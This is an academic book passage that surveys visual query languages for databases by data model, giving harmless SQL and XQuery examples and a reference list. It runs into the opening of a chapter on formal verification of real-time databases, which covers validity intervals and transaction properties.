The effectiveness of a VQL is strongly influenced by the simplicity and intuitiveness of the visual model and hence, through the visual metaphor, of the data model. Complex, abstract, and semantically rich data models tend to produce complex visual models with a high impedance mismatch with the underlying data structures. However, elementary data models have necessarily limited representation capabilities and complex concepts need to be mapped to over-simplified visual constructs, far from the user's perception of the area of interest. Traditionally, data models are classified into three main categories, each corresponding to a different abstraction level in the representation of the area of interest:

• Conceptual models (e.g., the entity-relationship data model) are the most abstract and describe concepts of the real world, rather than the data used to represent them. Due to their high level of abstraction they are commonly used in the first phases of the database design process, but the actual implementation of DBMSs (and consequently of query languages) based on them can be quite problematic.
• Logical models (e.g., the relational, hierarchical, and object data model) reflect a particular organization (table, tree, object) of the data, facilitating the implementation of DBMSs based on them and query optimization, while maintaining a good level of abstraction expressed by the so-called property of physical independence: the interaction with the DBMS is independent of the data's physical aspects (files, storage systems, etc.). Most DBMSs and query languages (especially visual ones) are therefore based on logical models.
• Physical models are strictly related to the physical organization of data in the DBMS (storage techniques, access structures, etc.) and are therefore inappropriate for the definition of high-level, user-friendly query languages.
Even if most VQLs are based on logical models, there can be significant differences among them, mainly related to the particular data organization (e.g., table, tree, object) on which the model is based. In the following section, we classify VQLs according to their data model, focusing on languages based on (1) conceptual models; (2) the relational model; (3) the functional model; (4) the object model; (5) XML. Finally, we consider the case of VQLs specifically designed for particular types of data (e.g., geographical and multidimensional data).
VQLs Based on Conceptual Models The entity-relationship (E-R) model was originally proposed in Chen (1976) and is commonly recognized as the standard conceptual model for database design. As such, it can be mapped to several different logical data models and consequently to DBMSs and storage techniques. It is also a graphical model based on fairly simple
diagrams consisting of a few geometric elements connected by edges. In consequence, it could be considered an ideal starting point to define a visual query language. However, its high level of abstraction is also its main drawback for use in a real DBMS, as some transformations from the visual to the logical level can be particularly difficult and some manipulations that can be straightforwardly expressed at the logical level may be cumbersome to define at the conceptual level. A VQL based on the E-R model is proposed in Czejdo et al. (1989). Queries are expressed by visually selecting the elements of interest (entities and relationships) in a database schema displayed as an E-R diagram. Conditions on the selected elements are expressed by a set C, initially empty, of condition descriptors, stating for example that the attribute of an entity must be equal to a given constant value. In Angelaccio et al. (1990), the QBD* system is described; this allows the user to interact with the conceptual (E-R) schema of the database at different abstraction levels through a top-down browsing mechanism. A set of graphical primitives can be used to extract the subschema containing the query concepts (i.e., the input schema) as well as to filter and transform the selected concepts, defining the desired output schema. SUPER (Dennebouy et al., 1995) is based on an object-based extension of the E-R model called ERC+ and designed to support complex objects and object identity. SUPER has a layered structure allowing the user to interact with the ERC+ elements independently of the actual underlying DBMS and comprising a specifically designed algebra in the intermediate layer. The construction of a query encompasses a sequence of activities performed through the visual interface: definition of the query frame (input schema), the specification of conditions on the database occurrences, and finally the output format. Another example of a “conceptual VQL” is ConQuer (Bloesch & Halpin, 1996), which is based on the object-role modelling (ORM) approach to conceptual modelling.
VQLs Based on the Relational Model

In the relational model (Codd, 1970), data are represented by collections of relations or, more intuitively, as collections of tables. Each table (relation) has a specific, well-defined structure (the relation schema) with a table name and a collection of column names called attributes, and consists of a collection of related rows (tuples) of data values (the relation instance). Queries can be expressed in a variety of textual languages (e.g., relational algebra, domain and tuple calculi, datalog, and SQL). Integrity constraints (i.e., properties that must be satisfied by relation instances representing semantically correct information in the domain of interest) can also be defined. Integrity constraints, especially referential constraints, are often exploited by VQLs to highlight the semantic links existing among tables and to perform automatic joins between them. The simplicity and strong mathematical foundations of the relational model are certainly two key factors for its great success. In fact, the vast majority of currently available DBMSs are relational and, in consequence, many visual languages proposed in the literature are based on this model. Since relational data have a fairly simple structure, relational VQLs can usually achieve a good trade-off between expressive power and language complexity. In contrast, when dealing with more sophisticated data models (e.g., based on objects or semi-structured data) the higher complexity necessarily permeates the query language (even in the textual case) and this trade-off is much more difficult to achieve. The tabular structure underlying the model is well suited to VQLs based on tabular forms such as the query-by-example (QBE) language previously mentioned, originally proposed in Zloof (1977) and later implemented with some variations in several DBMSs. Other approaches are based on the use of icons and attempt to exploit the additional information provided by the integrity constraints to guide
the query’s construction. For example, VISIONARY (Benzi, Maio, & Rizzi, 1999) is based on a layered structure where the visual metaphor uses an intermediate graph model for the mapping between the internal relational schema and the external icon-based visual schema. A relational database is represented in the intermediate graph model by a non-directed graph where each vertex corresponds to a table and the edges represent potential links (i.e., relationships determined by referential integrity constraints). The basic primitives of the visual model are the concepts (represented by the combination of a text and an icon) and the associations between concepts (represented by labelled oriented edges). The user specifies the input schema starting from a primary concept, which determines a set of default joins, and then refines it up to the desired output with projection and selection operations by interacting with the visual schema displayed on the screen. A semantic graph model is also used in Zhang et al. (1999) where nodes represent tables and the edges correspond to joins between relations, which are used to support the user in the query formulation process. The query-by-browsing (QBB) paradigm (Polyviou, Samaras, & Evripidou, 2005) proposes a quite different approach to visual querying based on the tuple relational calculus and folder hierarchies. Tables are represented as folders and the relationships between them (e.g., foreign key references) as folder/subfolder relationships, which can be “followed” by opening the table folder containing the reference. A table folder also contains attributes and records corresponding to the table schema and instance on which constraints can be defined. Figure 5 gives an example of a folder tree representing the schema of a relational database describing the relationships between students, professors, courses, classes, and rooms. Folders can also act as operators to filter and combine the respective subfolders. To define the query output schema the concept of document is introduced. This is a materialized view over the
data contained in the document's parent folder and its subfolders. Although based on the relational model, QBB has also been shown to possibly accommodate more complex data models (e.g., based on objects or XML).

Figure 5. A folder tree in query by browsing
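The way these languages exploit referential integrity can be pictured with a small, purely illustrative relational schema (all table and column names below are invented): the foreign key is the potential link that VISIONARY turns into a graph edge and QBB into a folder/subfolder relationship, and selecting the two concepts lets the system emit the corresponding join automatically.

-- Illustrative schema: the foreign key provides the link a VQL can visualize.
CREATE TABLE department (
  dept_id INTEGER PRIMARY KEY,
  name    VARCHAR(50)
);
CREATE TABLE employee (
  emp_id  INTEGER PRIMARY KEY,
  name    VARCHAR(50),
  dept_id INTEGER REFERENCES department(dept_id)
);

-- Join generated automatically when the user selects the two concepts:
SELECT e.name, d.name
FROM   employee e
JOIN   department d ON e.dept_id = d.dept_id;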
VQLs Based on the Functional Data Model

The functional data model (Sibley & Kerschberg, 1977) is basically a functional view of the binary relational model in which the area of interest is represented by entities and binary relations between pairs of entities. More precisely, each binary relation over domains A and B is equivalently defined by a pair of (possibly multi-valued) functions from A to B and from B to A, forming, together with the entities, the basic elements of the model. The main advantage of this simplified data model is that mapping between the data schema and the visual schema is generally more straightforward and the user's navigation among the schema elements can be guided by the functional links between concepts. Gql (Papantonakis et al., 1994) is a VQL based on the functional data model. Similarly to VISIONARY, the database schema is represented by a graph where nodes correspond to entities and labeled directed edges to functions. Entities can be either lexical (broadly corresponding to simple data types such as strings, numbers, etc.) or abstract (corresponding to real world concepts). Lexical entities are visualized as ovals and abstract entities as circle nodes. Queries are expressed by selecting elements on the input schema, specifying constraints on them (e.g., ="Rome", >10, etc.) and indicating the subset that will constitute the output schema. Various types of boxes can be used to enclose portions of the input schema and define nested queries, aggregations, negations, disjunctions, quantifications, etc.

VQLs Based on the Object Data Model
The object data model was developed to overcome some limitations of the relational model and is based on the extension of the object-oriented programming paradigm (specifically, the concepts of class, object identity, encapsulation, inheritance) to databases (Atkinson et al., 1989). Objects in an object database can have a much more complex structure with respect to the rows (tuples) of a relational database, as the single object components may also contain references to other objects, as well as sets, bags (multisets), and lists of elementary values or even of other objects. Classes of objects can also be organized in generalization hierarchies where more specific classes “inherit” and typically specialize the schema of the more general ones. Since the elements of an object database usually have this fairly complex nested structure, the use of tabular metaphors is not as obvious or straightforward as in the relational case. In contrast, graph-based
approaches are usually preferred where different edges are used to represent nesting and relationships among objects. Iconic approaches are also well suited to represent objects, classes, and the various relationships among them visually. The visual query system for object databases of the integrated environment PROOVE (Doan, Paton, Kilgour, & al-Qaimari, 1995) supports two alternative (form- and graph-based) visualization metaphors. In the graph-based interface, the input and output schemas are visualized by directed graphs where double rectangles represent classes, single rectangles represent elementary data types (e.g., integer, float, and string), and the edges describe the class structure. The two schemas are displayed in two separate frames of the user interface (see Figure 6). By selecting a node in the input schema, the user can include it in the output schema (query graph), which is displayed in the query window. The query can be further refined in this window by expressing conditions and/or extending the output schema by popup menus attached to the various nodes. The
example query shown in Figure 6 is taken from Doan et al. (1995) and represents the retrieval of the details of all books borrowed by borrowers with a cname of Scott. A graph-based interface is also used in O2Talk (Sentissi & Pichat, 1997). In this language, classes are depicted by rectangle nodes, attributes by continuous or discontinuous ovals (for atomic and complex attributes respectively), and the class-superclass relationships are represented by links between classes. Queries in VOODOO (Fegaras, 1999) are represented by trees of forms, which have some analogies with QBB folder trees. The forms reflect the database schema and every class or type reference in the schema can be “expanded” by clicking on the corresponding form button in the visual interface, potentially leading to an infinite tree. Each tree node consists of a form and represents a class or structure in the database schema. Besides being used to expand the query tree, the individual fields in each form can be filled in with constant values and expressions or be included in the output schema, similarly
Figure 6. The visual definition of a query in the PROOVE environment (database schema, query graph, and query condition windows)
Figure 7. An example of query expressed in VOODOO language
to QBE. Figure 7 represents the query “Find the name of the department whose head is Smith” in the VOODOO language. Finally, Chavda and Wood (1997) propose the Quiver language with a fairly modular approach combining graphs with an iconic interface. Here, graphs are used not only to describe the database structure (as in many other VQLs), but also to represent the data flow to and from computations, for example the data flow corresponding to the application of a method to a class of objects. Furthermore, graphs are generally nested, as each node can include other nodes and possibly arcs and bold nodes and arcs are used to define the query output schema visually.
VQLs Based on the XML Data Model The extensible markup language (XML) is a general-purpose textual language specifically designed to define various kinds of data structures (i.e., the database schema) as well as to store the data contents in XML documents (the database instance). The typical hierarchical structure of XML documents is reflected in the VQLs based on this language and naturally leads to the adoption of graph-based visual models. The standard textual
query language for XML is XQuery (Boag et al., 2006), which is based on the so-called FLWOR (for-let-where-order by-return) expressions and has some similarities with the SQL syntax. XQBE (XQuery by example) was proposed by Braga, Campi, and Ceri (2005) to visually express a fairly large subset of XQuery and can be considered as an evolution of XML-GL (Comai, Damiani, & Fraternali, 2001). The main graphical element in XQBE is the tree, which is used to denote both the documents assumed as query input (the input schema) and the document produced by the query (the output schema). Tree nodes represent the various elements of the XML documents and are shaped in different ways according to the specific semantics. In particular: (1) root nodes are represented as grey squares labelled with the location (URI) of the corresponding XML document; (2) element nodes are shaped as rectangles labelled with the element name (or tagname); (3) PCDATA nodes are represented as empty circles, (4) attribute nodes are represented as filled black circles. Other node types and notations are introduced to express specific manipulations and selections. Finally, directed arcs are used to represent the containment relationship between two XML items. For example, Figure 8 shows the
Figure 8. Example of XQBE query
XQBE formulation of the query “Return all books in the source document, retaining for each book only the list of their authors and the title; change also the tagname to myBook.” Figure 8 shows that the query window is divided into two parts: the source (corresponding to the input schema) on the left and the construct (corresponding to the output schema) on the right. Obviously, the source part describes the structure to be matched against the set of input documents, while the construct part specifies which elements will be retained in the result, together with (optional) newly generated items. The two parts are linked by binding edges expressing the correspondence between the respective components. Tree structures with variously shaped nodes are also used in the XQueryViz tool (Karam, Boulos, Ollaic, & Koteiche, 2006), which is strongly related to the XQuery syntax and whose interface is based on four interdependent windows displaying (1) the XML schemas and documents; (2) the for-let-where clause of the query in visual form; (3) the return clause of the query in visual form; (4) the textual XQuery representation of the query. During query formulation, the textual representation is continuously updated and the
various parts are given different colors to reflect the correspondence between the visual and its textual counterpart. The Xing language (Erwig, 2003) uses a completely different approach to the representation of the typical hierarchical structure of XML documents. Here, XML elements are represented by nested boxes/forms and the hierarchies between elements by relationships of visual inclusion. As in many other VQLs, the query is expressed by defining, in two separate sections of the visual interface, the input schema, through an argument pattern, which specifies the structural and content constraints, and the output schema, through a result pattern, which performs selection, and restructuring operations on the extracted data.
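For comparison with the visual form, the query of Figure 8 corresponds to an XQuery expression along the following lines (a sketch; the source document URI is abbreviated to bib.xml):

for $b in doc("bib.xml")/bib/book
return
  <myBook>
    (: retain only the authors and the title, renaming the element :)
    { $b/author }
    { $b/title }
  </myBook>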
VQLs and Special Purpose Data Several interesting applications of VQLs can be found in contexts where the data have some explicit geometric properties, describe some spatial relationships, or are commonly described by means of a geometric metaphor. This is obviously the case in geographical information systems (GISs), but also in data warehouses, which are based on the well-known metaphor of the multi-dimensional data cube and in scientific databases containing for instance scientific experimental data. In geographic information systems (GISs), topological relationships between geographical entities can be expressed very intuitively in visual form. VQLs for this kind of data usually represent geographical entities with a very limited number of symbolic graphical objects (SGOs) namely point, polyline, and polygon. In several languages queries are expressed by drawing a geometric pattern (e.g., two intersecting polygons, a polygon including another polygon, a polyline adjacent to a polygon, etc.) corresponding to the desired result. For example in Cigales (Aufaure-Portier, 1995), queries are expressed using predefined graphical forms (icons) representing both the geographical entities and the topological relationships among
them while in pictorial query-by-example (Papadias & Sellis, 1995) skeleton arrays are used to represent a set of objects and their spatial relationships. The inherent ambiguity of some geometric patterns has been studied by several authors and Ferri & Rafanelli (2005) propose the introduction of specific G-any and G-alias operators to cope with this issue. As previously discussed, an important family of VQLs for GISs is based on sketches (e.g., Sketch! (Meyer, 1992), spatial-query-by-sketch (Egenhofer, 1997), and VISCO (Haarslev et al., 1997)). Data warehouses are traditionally described using the well-known metaphor of the multi-dimensional data cube and the concepts of dimensions and dimension hierarchies. A data cube is a collection of aggregate values (measures) classified according to several properties of interest (dimensions), each of which is possibly organized in hierarchies. Combinations of dimension values are used to identify the single aggregate values in the cube and querying is often an exploratory process, where the user “moves” along the dimension hierarchies by increasing or reducing the granularity of displayed data. A diagrammatic VQL for multidimensional data was proposed by Cabibbo and Torlone (1998) and is based on a graphical diagrammatic representation of the data warehouse schema where hierarchies are represented by directed arcs and dimensions by enclosing shapes. As in many other diagrammatic VQLs, the output data is selected by expressing constraints on the schema elements and highlighting the desired measures and dimension levels on the warehouse schema. An example of VQL for the exploratory navigation of scientific data is VISUAL (Balkir et al., 2002), which was designed for the domain of materials engineers for use with scientific experimental data, in particular their spatial properties. VISUAL uses icons to represent both the objects of interest and their spatial relationships, and users can define their own graphical icons
to recreate the environment that they are familiar with. Although graphical, the structure of a VISUAL query closely resembles datalog rules with a body section containing iconized objects, constraints, and references to other objects (i.e., the input schema) and a head section representing the various components of the query output.
CONCLUSION In this chapter, we analyzed some fundamental characteristics of VQLs (i.e., visual languages specifically designed to retrieve data from information systems). A first important feature is the set of visual representation techniques used to formulate the queries. We have shown that VQLs can be broadly classified as (1) tabular or form based, using prototype tables with table fields filled in with constant values and expressions; (2) diagrammatic, based on the use of simple geometric shapes connected by arcs; (3) iconic, based on the use of icons to represent both the objects in the database and the operators to manipulate them; (4) sketch-based, where the query is formulated by freehand sketches on a virtual blackboard; and finally (5) hybrid, combining two or more of these approaches. Secondly, we have analyzed the relationships between VQLs and the features of the underlying data model, with a specific focus on the level of abstraction, the most commonly used data models (conceptual, relational, object, functional, XML) and information systems specifically designed for particular kinds of data such as GISs and data warehouses.
REFERENCES

Abiteboul, S., Hull, R., & Vianu, V. (1995). Foundations of databases. Addison-Wesley.
Angelaccio, M., Catarci, T., & Santucci, G. (1990). QBD*: A fully visual query system. Journal of Visual Languages and Computing, 1(2), 255-273.
Atkinson, M. P., Bancilhon, F., DeWitt, D. J., Dittrich, K. R., Maier, D., & Zdonik, S. B. (1989). The object-oriented database system manifesto. The 1st International Conference on Deductive and Object-Oriented Databases (DOOD'89) (pp. 223-240).
Atzeni, P., Ceri, S., Paraboschi, S., & Torlone, R. (1999). Database systems: Concepts, languages, and architectures. McGraw-Hill.
Aufaure-Portier, M. A. (1995). A high level interface language for GIS. Journal of Visual Languages and Computing, 6(2), 167-182.
Aufaure-Portier, M. A., & Bonhomme, C. (1999). A high-level visual language for spatial data management. The 3rd International Conference on Visual Information and Information Systems (VISUAL 1999) (pp. 325-332).
Aversano, L., Canfora, G., De Lucia, A., & Stefanucci, S. (2002). Understanding SQL through iconic interfaces. The International Computer Software and Applications Conference (COMPSAC 2002) (pp. 703-710).
Balkir, N. H., Ozsoyoglu, G., & Ozsoyoglu, Z. M. (2002). A graphical query language: Visual and its query processing. IEEE Transactions on Knowledge and Data Engineering, 14(5), 955-978.
Benzi, F., Maio, D., & Rizzi, S. (1999). VISIONARY: A viewpoint-based visual language for querying relational databases. Journal of Visual Languages and Computing, 10(2), 117-145.
Blackwell, A. F., & Green, T. R. G. (1999). Does metaphor increase visual language usability? IEEE Symposium on Visual Languages (VL'99) (pp. 246-253).
Blaser, A. D., & Egenhofer, M. J. (2000). A visual tool for querying geographic databases. Working Conference on Advanced Visual Interfaces (AVI 2000) (pp. 211-216).
Bloesch, A. C., & Halpin, T. A. (1996). ConQuer: A conceptual query language. International Conference on Conceptual Modeling (ER 1996) (pp. 121-133).
Boag, S., Chamberlin, D., Fernandez, M. F., Florescu, D., Robie, J., & Simeon, J. (2006). XQuery 1.0: An XML query language. Retrieved October 13, 2006, from http://www.w3.org/TR/xquery/
Braga, D., Campi, A., & Ceri, S. (2005). XQBE (XQuery by example): A visual interface to the standard XML query language. ACM Transactions on Database Systems, 30(2), 398-443.
Cabibbo, L., & Torlone, R. (1998). From a procedural to a visual query language for OLAP. International Conference on Scientific and Statistical Database Management (SSDBM'98) (pp. 74-83).
Catarci, T., Costabile, M. F., Levialdi, S., & Batini, C. (1997). Visual query systems for databases: A survey. Journal of Visual Languages and Computing, 8(2), 215-260.
Catarci, T., Santucci, G., & Angelaccio, M. (1993). Fundamental graphical primitives for visual query languages. Information Systems, 18(3), 75-98.
Chavda, M., & Wood, P. T. (1997). Towards an ODMG-compliant visual object query language. International Conference on Very Large Data Bases (VLDB'97) (pp. 456-465).
Chen, P. P. (1976). The entity-relationship model: Towards a unified view of data. ACM Transactions on Database Systems, 1(1), 9-36.
Codd, E. F. (1970). A relational model of data for large shared databanks. Communications of the ACM, 13(6), 377-387.
Comai, S., Damiani, E., & Fraternali, P. (2001). Computing graphical queries over XML data. ACM Transactions on Information Systems, 19(4), 371-430.
Czejdo, B., Embley, D., Reddy, V., & Rusinkiewicz, M. (1989). A visual query language for an ER data model. IEEE Workshop on Visual Languages (pp. 165-170).
Dennebouy, Y., Andersson, M., Auddino, A., Dupont, Y., Fontana, E., Gentile, M., & Spaccapietra, S. (1995). SUPER: Visual interfaces for object + relationships data models. Journal of Visual Languages and Computing, 6(1), 73-99.
Doan, D. K., Paton, N. W., Kilgour, A. C., & al-Qaimari, G. (1995). Multi-paradigm query interface to an object-oriented database. Interacting with Computers, 7(1), 25-47.
Egenhofer, M. J. (1997). Query processing in spatial-query-by-sketch. Journal of Visual Languages and Computing, 8(4), 403-424.
Erwig, M. (2003). Xing: A visual XML query language. Journal of Visual Languages and Computing, 14(1), 5-45.
Fegaras, L. (1999). VOODOO: A visual object-oriented database language for ODMG OQL. ECOOP Workshop on Object-Oriented Databases (pp. 61-72).
Ferri, F., & Rafanelli, M. (2005). GeoPQL: A geographical pictorial query language that resolves ambiguities in query interpretation. Journal on Data Semantics, 50-80.
Haarslev, V., & Wessel, M. (1997). Querying GIS with animated spatial sketches. The 13th IEEE Symposium on Visual Languages 1997 (VL'97) (pp. 201-208).
Haber, E. M., Ioannidis, Y. E., & Livny, M. (1994). Foundations of visual metaphors for schema display. Journal of Intelligent Information Systems, 3(3-4), 263-298.
Karam, M., Boulos, J., Ollaic, H., & Koteiche, Z. (2006). XQueryViz: A visual dataflow XQuery tool. International Conference on Internet and Web Applications and Services (ICIW'06).
Larkin, J. H., & Simon, H. (1987). Why a diagram is (sometimes) worth ten thousand words. Cognitive Science, 11(1), 65-100.
Massari, A., Pavani, S., & Saladini, L. (1994). QBI: An iconic query system for inexpert users. Working Conference on Advanced Visual Interfaces (AVI'94) (pp. 240-242).
Meyer, B. (1992). Beyond icons: Towards new metaphors for visual query languages for spatial information systems. International Workshop on Interfaces to Database Systems (IDS'92) (pp. 113-135).
Meyer, B. (1994). Pictorial deduction in spatial information systems. IEEE Symposium on Visual Languages (VL'94) (pp. 23-30).
Murray, N., Paton, N. W., & Goble, C. A. (1998). Kaleidoquery: A visual query language for object databases. Working Conference on Advanced Visual Interfaces (AVI'98) (pp. 247-257).
Papadias, D., & Sellis, T. K. (1995). A pictorial query-by-example language. Journal of Visual Languages and Computing, 6(1), 53-72.
Papantonakis, A., & King, P. J. H. (1994). Gql, a declarative graphical query language based on the functional data model. Workshop on Advanced Visual Interfaces (AVI'94) (pp. 113-122).
Polyviou, S., Samaras, G., & Evripidou, P. (2005). A relationally complete visual query language for heterogeneous data sources and pervasive querying. International Conference on Data Engineering (ICDE'05) (pp. 471-482).
Rosengren, P. (1994). Using visual ER query systems in real world applications. Advanced Information Systems Engineering (CAiSE'94) (pp. 394-405), LNCS 811.
Sentissi, T., & Pichat, E. (1997). A graphical user interface for object-oriented database. International Conference of the Chilean Computer Science Society (SCCC'97) (pp. 227-239).
Sibley, E. H., & Kerschberg, L. (1977). Data architecture and data model considerations. AFIPS National Computer Conference.
Staes, F., Tarantino, L., & Tiems, A. (1991). A graphical query language for object-oriented databases. IEEE Symposium on Visual Languages (VL'91) (pp. 205-210).
Vadaparty, K., Aslandogan, Y. A., & Ozsoyoglu, G. (1993). Towards a unified visual database access. In ACM SIGMOD International Conference on Management of Data (SIGMOD'93) (pp. 357-366).
Zhang, G., Chu, W. W., Meng, F., & Kong, G. (1999). Query formulation from high-level concepts for relational databases. International Workshop on User Interfaces to Data Intensive Systems (UIDIS'99) (pp. 64-75).
Zloof, M. M. (1977). Query-by-example: A database language. IBM Systems Journal, 16(4), 324-343.
This work was previously published in Visual Languages for Interactive Computing: Definitions and Formalizations, edited by F. Ferri, pp. 142-157, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 3.10
A Formal Verification and Validation Approach for Real-Time Databases

Pedro Fernandes Ribeiro Neto, Universidade do Estado do Rio Grande do Norte, Brazil
Maria Lígia Barbosa Perkusich, Universidade Católica de Pernambuco, Brazil
Hyggo Oliveira de Almeida, Federal University of Campina Grande, Brazil
Angelo Perkusich, Federal University of Campina Grande, Brazil
ABSTRACT

Real-time database-management systems provide efficient support for applications with data and transactions that have temporal constraints, such as industrial automation, aviation, and sensor networks, among others. Many issues in real-time databases have attracted research interest, such as concurrency-control mechanisms, scheduling policies, and quality-of-service management. However, considering the complexity of
these applications, it is of fundamental importance to conceive formal verification and validation techniques for real-time database systems. This chapter presents a formal verification and validation method for real-time databases. Such a method can be applied to database systems developed for computer integrated manufacturing, stock exchange, network-management, and command-and-control applications and multimedia systems. In this chapter, we describe a case study that considers sensor networks.
INTRODUCTION

Nowadays, the heterogeneity of platforms, distributed execution, real-time constraints, and other features are increasingly making software development a more complex activity. Besides, the amount of data to be managed is increasing as well. Taken together, complexity and data management are raising both the risk and the cost of software projects. Database management systems are used to manage and store large amounts of data efficiently. However, when both data and transactions have timing restrictions, real-time databases (RTDB) are required to deal with real-time constraints (Ribeiro-Neto, Perkusich, & Perkusich, 2004). For an RTDB, the goal is to complete transactions on time, while maintaining the logical and temporal consistency of the data. For real-time systems, correct system functionality depends on logical as well as on temporal correctness. Static analysis alone is not sufficient to verify the temporal behavior of real-time systems. To satisfy logical and temporal consistency, concurrency-control techniques and time-cognizant transaction processing can be used, respectively; the latter is achieved by tailoring transaction-management techniques to explicitly deal with time. The real-time ability defines nonfunctional requirements of the system that must be considered during software development, and quality assurance of real-time systems is necessary to ensure that the real-time ability has been correctly specified. Imprecise computation is used as a technique for real-time systems where precise outputs are traded off for timely responses to system events. For that, formal models can be created to verify the requirement specifications, including the real-time specifications (Ribeiro-Neto, Perkusich, & Perkusich, 2003). Validation as well as verification can be carried out with a simulation model. With the simulation model, a random sample is selected from the input domain of the test object, which is then
simulated with these chosen input values. After that, the results obtained by this execution are compared with the expected values. Thus, a simulation model is a dynamic technique, that is, a technique that involves the execution of the test object. One major objective of simulation models is error detection (Herrmann, 2001). The main motivation for this research is the fact that methods to describe conceptual models of conventional database systems cannot be directly applied to describe models of real-time database systems. This is because these models do not provide mechanisms to represent the temporal restrictions that are inherent to real-time systems. Also, most of the available models focus on the representation of static properties of the data. On the other hand, complex systems, such as real-time databases, also require the modeling of dynamic properties of data and information. Therefore, the development of methods to design real-time databases with support for both static and dynamic modeling is an important issue. In the literature, there are few works on real-time database modeling that allow a formal analysis covering verification and validation characteristics. In particular, the existing tools supporting the modeling process do not provide simulation capabilities. The unified modeling language (UML) approach presents a number of favorable characteristics for modeling complex real-time systems, as described in Selic and Rumbaugh (1998) and Douglass (2004). UML is also used for modeling object-oriented database systems. However, the existing tools for UML modeling do not provide simulation capabilities. This chapter describes a formal approach to verify and validate real-time database systems. The approach consists of five steps: (1) building an object model; (2) building a process model; (3) generating an occurrence graph; (4) generating a message-sequence chart; and (5) generating a timing diagram. The first two steps comprise static and dynamic analysis, respectively. The following steps allow the user
to validate the model. Hierarchical coloured Petri nets (HCPNs) are used as the formal language to describe RTDB models (Jensen, 1998). The proposed approach can be applied to different domains, such as computer-integrated manufacturing, stock exchanges, network management, command-and-control applications, multimedia systems, sensor networks, and navigation systems. In this chapter, we describe a case study considering sensor networks. Sensor networks are used to control and monitor the physical environment; sensor nodes may have different physical sensors and can be used for different application scenarios. The remainder of this chapter is organized as follows. First, a background is presented to ease the comprehension of the approach, defining concepts about RTDB, quality of service, and HCPNs. Second, the formal verification and validation approach for real-time databases is described, as well as a sensor network case study. Third, future trends are presented. Finally, conclusions are drawn.
BACKGROUND

Real-Time Databases (RTDB)

Real-time database-management systems must provide the characteristics of conventional databases while also assuring that real-time constraints are imposed on both the data and the transactions. These constraints arise in applications where transactions must meet deadlines. The number of applications that benefit from the utilization of RTDB is increasing as well. This increase is a consequence of the proliferation of embedded systems, which include both systems similar to those present in personal computers and smaller systems with minimal memory and computing capacity, such as those present in mobile devices. An RTDB is required when the volume of data is large, responses depend on multiple values, responses to aperiodic events are required, and there are constrained timing requirements. Correctness in real-time databases implies satisfying all usual consistency constraints, executing transactions within their timing constraints, and satisfying the temporal consistency of the data. The real-time data and transactions are defined accordingly: the data items reflect the state of the environment, and the transactions are classified with respect to their deadlines (hard, soft, or firm), their arrival pattern (periodic, aperiodic, or sporadic), and their data-access pattern (read-only, write-only, or update). In Figure 1, a schema illustrating the properties of the RTDB is shown.

Figure 1. Real-time database systems (traditional database systems: data management, transaction support, concurrency control, query processing)
Data Properties

The data correctness in an RTDB is assured by logical and temporal consistency. Real-time data can be classified into static and dynamic. The correctness of static data is guaranteed by logical consistency, since it does not become outdated. Dynamic data may change continuously to reflect the real-world state, such as object positions, physical measures, stock market values, and so on. Each dynamic datum has a timestamp of its latest update, and the data can be divided into base data and derived data. A derived datum can be derived from various base data (Kang, 2001). The external consistency of dynamic data is defined using validity intervals to assure the consistency between the state represented by the database content and the actual state of the environment. The validity intervals are of two types, as follows (Kang, 2001):

• Absolute validity interval (avi): defined between the environment state and the value reflected in the database. A data item x is considered temporally inconsistent if (now - timestamp(x) > avi(x)), where now is the current time of the system and timestamp(x) is the time of the latest update of x.
• Relative validity interval (rvi): defined among the data used to derive other data. Consider a data item y derived from a data set R = {x1, x2, ..., xk}. y is temporally consistent if the data in R that compose it are temporally valid and |timestamp(xi ∈ R) - timestamp(xj ∈ R)| ≤ rvi(y). This measure ensures that derived data are produced from data of approximately the same time.

Dynamic data are represented by x:(value, avi, timestamp) and are temporally consistent if both the absolute and the relative validity intervals are satisfied. Consider the example where a data item t, with avi(t) = 5, reflects the current temperature and the data item p represents the pressure, with avi(p) = 10. The data item y is derived from the data set R = {t, p} and has relative validity interval rvi(y) = 2. If the current time is 50, then (a) t:(25,5,45) and p:(40,10,47) are temporally consistent, because both the absolute and the relative validity intervals hold. But (b) t:(25,5,45) and p:(40,10,42) are not temporally consistent, because only the absolute validity interval is assured.
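As a purely illustrative sketch of the absolute-validity test now - timestamp(x) > avi(x), assuming a PostgreSQL-style store of sensor readings whose table and column names are invented here:

-- Readings older than their absolute validity interval (avi, in seconds)
-- are temporally inconsistent and must be refreshed by a sensor transaction.
SELECT   r.sensor_id, r.value, r.ts, r.avi
FROM     reading r
WHERE    EXTRACT(EPOCH FROM (now() - r.ts)) > r.avi;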
Transaction Properties

Real-time transactions are characterized along three dimensions, based on the nature of transactions in real-time database systems: the nature of the real-time constraints, the arrival pattern, and the data-access type.

• Real-time constraints: The real-time constraints of transactions are related to the effect of missing their deadlines and can be categorized as hard, firm, and soft. Hard deadlines are those whose loss may result in a catastrophe; these are typically critical systems, such as a delayed command to stop a train causing a collision. Completing a transaction with a soft deadline after its time constraint is undesirable; however, missed soft deadlines only degrade system performance. Transactions with firm deadlines are aborted if their temporal constraints are missed.
• Arrival pattern of transactions: The arrival pattern of transactions refers to the time interval between executions. Generally, the transactions are periodically executed in real-time databases, since they are used to record the device readings associated with the environment or to manipulate system events. The arrival pattern can also be aperiodic, where there is no regular time interval between the executions of transactions. Transactions can also execute at random times while respecting a minimal time interval between executions (sporadic).
• Data access type: In relation to data access, the transactions are categorized as write transactions (or sensor transactions), update transactions, and read transactions. The write transactions obtain the state of the environment and write it into the database. The update transactions derive new data and store them in the database. Finally, the read transactions read data from the database and send them.
In the database, it is necessary to guarantee the same view of the same data item for different transactions. This property is called internal consistency and is assured by the ACID properties. ACID is an acronym for atomicity, consistency, isolation, and durability. These properties are defined for a real-time database as follows:

• Atomicity: Applied to subtransactions, where a subtransaction must be executed entirely or not at all.
• Consistency: The execution of a transaction must always take the database from one consistent state to another. A limited imprecision in the internal consistency can be permitted in order to meet the temporal constraints of transactions.
• Isolation: The actions of a transaction can be visible to other transactions before it commits.
• Durability: The actions of a transaction need not be persistent, since both data and transactions have temporal validity.
